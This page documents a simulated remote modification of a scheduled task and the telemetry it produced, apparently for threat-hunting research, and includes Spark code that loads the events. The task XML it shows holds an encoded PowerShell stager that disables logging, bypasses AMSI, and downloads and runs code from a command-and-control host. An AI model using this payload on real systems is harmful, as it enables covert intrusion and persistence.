Remote Scheduled Task Modification

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/12/19

Modification Date

2020/12/19

Tactics

[‘TA0002’, ‘TA0003’, ‘TA0004’, ‘TA0008’]

Techniques

[‘T1053.005’]

Tags

None

Dataset Description

This dataset represents a threat actor modifying a scheduled task remotely.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Lab VM

Manual

PowerShell

Adversary View

Name               : EventCacheManager
Path               : \Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager
State              : 3
Enabled            : True
LastRunTime        : 11/30/1999 12:00:00 AM
LastTaskResult     : 267011
NumberOfMissedRuns : 0
NextRunTime        : 12/30/1899 12:00:00 AM
Definition         : System.__ComObject
Xml                : <?xml version="1.0" encoding="UTF-16"?>
                    <Task version="1.2"
                    xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                      <RegistrationInfo>
                        <Date>2020-12-19T07:00:22</Date>
                        <Author>THESHIRE\pgustavo</Author>
                        <URI>\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager</URI>
                      </RegistrationInfo>
                      <Principals>
                        <Principal id="Author">
                          <UserId>S-1-5-18</UserId>
                        </Principal>
                      </Principals>
                      <Settings>
                        <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
                        <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                        <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
                        <IdleSettings>
                          <Duration>PT10M</Duration>
                          <WaitTimeout>PT1H</WaitTimeout>
                          <StopOnIdleEnd>true</StopOnIdleEnd>
                          <RestartOnIdle>false</RestartOnIdle>
                        </IdleSettings>
                      </Settings>
                      <Triggers>
                        <BootTrigger>
                          <StartBoundary>2020-12-19T07:00:00</StartBoundary>
                        </BootTrigger>
                      </Triggers>
                      <Actions Context="Author">
                        <Exec>
                          <Command>powershell</Command>
                          <Arguments>-noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAHIAcwBpAG8ATgBUAGEA
                    QgBsAEUALgBQAFMAVgBFAFIAUwBJAG8ATgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABDAD
                    MAMgAyAD0AWwBSAEUARgBdAC4AQQBzAFMAZQBNAEIAbABZAC4ARwBFAHQAVAB5AFAAZQAoACcAUwB5
                    AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdA
                    BpAGwAcwAnACkALgAiAEcARQB0AEYASQBlAGAAbABEACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUA
                    cABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAG
                    MALABTAHQAYQB0AGkAYwAnACkAOwBJAEYAKAAkAGMAMwAyADIAKQB7ACQAYwA3ADQAMgA9ACQAYwAz
                    ADIAMgAuAEcAZQBUAFYAYQBsAFUAZQAoACQAbgBVAGwAbAApADsASQBGACgAJABDADcANAAyAFsAJw
                    BTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAYwA3ADQA
                    MgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG
                    4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAw
                    ADsAJABDADcANAAyAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZw
                    AnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkA
                    bwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAVgBBAEwAPQBbAEMAbwBsAGwARQBjAHQASQBvAG
                    4AUwAuAEcAZQBuAGUAUgBpAGMALgBEAEkAYwB0AGkATwBOAGEAUgBZAFsAcwBUAHIAaQBuAGcALABT
                    AFkAcwBUAEUAbQAuAE8AYgBKAGUAYwB0AF0AXQA6ADoAbgBFAHcAKAApADsAJAB2AEEATAAuAEEARA
                    BEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4A
                    ZwAnACwAMAApADsAJABWAGEATAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAG
                    wAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAEMANwA0
                    ADIAWwAnAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcg
                    BlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwA
                    UABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAG
                    kAbgBnACcAXQA9ACQAdgBBAGwAfQBFAEwAUwBlAHsAWwBTAEMAcgBpAHAAVABCAGwATwBDAGsAXQAu
                    ACIARwBFAFQARgBJAGUAYABMAGQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKw
                    AnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAYQBMAHUARQAoACQA
                    bgB1AGwAbAAsACgATgBFAFcALQBPAGIASgBFAEMAVAAgAEMAbwBMAGwAZQBDAFQASQBvAE4AcwAuAE
                    cARQBuAGUAUgBJAEMALgBIAGEAcwBoAFMAZQB0AFsAcwBUAHIAaQBOAEcAXQApACkAfQAkAFIAZQBG
                    AD0AWwBSAGUARgBdAC4AQQBzAFMAZQBtAGIAbABZAC4ARwBlAHQAVABZAFAAZQAoACcAUwB5AHMAdA
                    BlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkA
                    JwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBlAGYALgBHAGUAdABGAGkARQBMAGQAKAAnAGEAbQBzAG
                    kASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABh
                    AHQAaQBjACcAKQAuAFMARQB0AFYAYQBMAFUAZQAoACQATgBVAEwATAAsACQAVABSAFUARQApADsAfQ
                    A7AFsAUwBZAFMAVABFAE0ALgBOAGUAdAAuAFMAZQBSAFYASQBDAGUAUABPAEkAbgB0AE0AYQBOAGEA
                    RwBFAFIAXQA6ADoARQBYAFAAZQBjAFQAMQAwADAAQwBPAE4AdABpAE4AdQBFAD0AMAA7ACQANQA3AD
                    kAMwA9AE4ARQB3AC0ATwBiAEoAZQBjAFQAIABTAHkAcwBUAGUATQAuAE4ARQBUAC4AVwBFAEIAQwBM
                    AGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcw
                    AgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAA
                    cgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAF
                    QARQB4AFQALgBFAG4AYwBPAGQAaQBuAGcAXQA6ADoAVQBuAEkAQwBPAEQARQAuAEcARQB0AFMAdABS
                    AGkAbgBHACgAWwBDAG8AbgBWAGUAcgB0AF0AOgA6AEYAcgBPAE0AQgBhAHMARQA2ADQAUwB0AHIASQ
                    BOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAEwA
                    ZwBBAHgAQQBEAEEAQQBMAGcAQQB4AEEARABBAEEATABnAEEAMQBBAEEAPQA9ACcAKQApACkAOwAkAH
                    QAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkADUANwA5ADMALgBI
                    AGUAYQBkAGUAcgBTAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJA
                    A1ADcAOQAzAC4AUAByAE8AWAB5AD0AWwBTAHkAcwB0AGUATQAuAE4ARQBUAC4AVwBFAGIAUgBlAHEA
                    VQBFAFMAdABdADoAOgBEAEUARgBhAHUAbAB0AFcARQBiAFAAUgBPAFgAeQA7ACQANQA3ADkAMwAuAF
                    AAcgBvAFgAWQAuAEMAUgBlAEQARQBuAFQAaQBBAGwAcwAgAD0AIABbAFMAWQBTAHQARQBNAC4ATgBF
                    AFQALgBDAHIARQBkAEUATgBUAGkAQQBMAEMAYQBjAEgARQBdADoAOgBEAEUAZgBhAFUAbABUAE4AZQ
                    BUAHcAbwBSAGsAQwByAEUAZABFAE4AdABJAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgA
                    eQAgAD0AIAAkADUANwA5ADMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBTAHQAZQBtAC4AVABFAH
                    gAVAAuAEUATgBjAE8AZABJAE4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAVABCAFkAdABlAFMAKAAn
                    ACMANgBGACsAPgBFADgAMgA3AEgAVgBKAEcARAB0AG0AOQB9AFQAQAAqADEAaQB4AD0AXwBkAG4ASQ
                    A0AFAAZQAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIA
                    NQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbAC
                    QAXwAlACQASwAuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABK
                    AF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKw
                    AxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsA
                    JABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAH
                    gATwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAk
                    ADUANwA5ADMALgBIAEUAQQBkAEUAUgBzAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAFcAVQ
                    BFAGgAaABKAGMAQQBxAEQAbwA9AE4AVgByAE8AYwBsAEQAYQBmAG0AcQBOADAAdABBAEcAMgBGACsA
                    TQAvAEwAagBFAHgAdgA4AD0AIgApADsAJABkAGEAVABhAD0AJAA1ADcAOQAzAC4ARABvAHcATgBMAE
                    8AYQBkAEQAQQBUAEEAKAAkAFMAZQBSACsAJABUACkAOwAkAEkAVgA9ACQARABhAHQAYQBbADAALgAu
                    ADMAXQA7ACQARABhAHQAYQA9ACQAZABBAHQAYQBbADQALgAuACQAZABhAFQAQQAuAEwAZQBOAGcAVA
                    BIAF0AOwAtAGoAbwBJAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQARABhAHQAQQAgACgA
                    JABJAFYAKwAkAEsAKQApAHwASQBFAFgA</Arguments>
                        </Exec>
                      </Actions>
                    </Task>

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/schtask_modification.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |726  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |508  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |459  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |218  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |203  |
|WORKSTATION5.theshire.local|Security                            |4658   |98   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |71   |
|WORKSTATION5.theshire.local|Security                            |4656   |50   |
|WORKSTATION5.theshire.local|Security                            |4690   |49   |
|WORKSTATION5.theshire.local|Security                            |4663   |43   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |21   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |19   |
|WORKSTATION5.theshire.local|Security                            |4703   |14   |
|WORKSTATION5.theshire.local|Security                            |5158   |11   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|11     |11   |
|WORKSTATION5.theshire.local|Security                            |4673   |10   |
|WORKSTATION5.theshire.local|Security                            |4688   |10   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|1      |10   |
|WORKSTATION5.theshire.local|Security                            |5156   |10   |
|WORKSTATION6.theshire.local|Security                            |5156   |9    |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows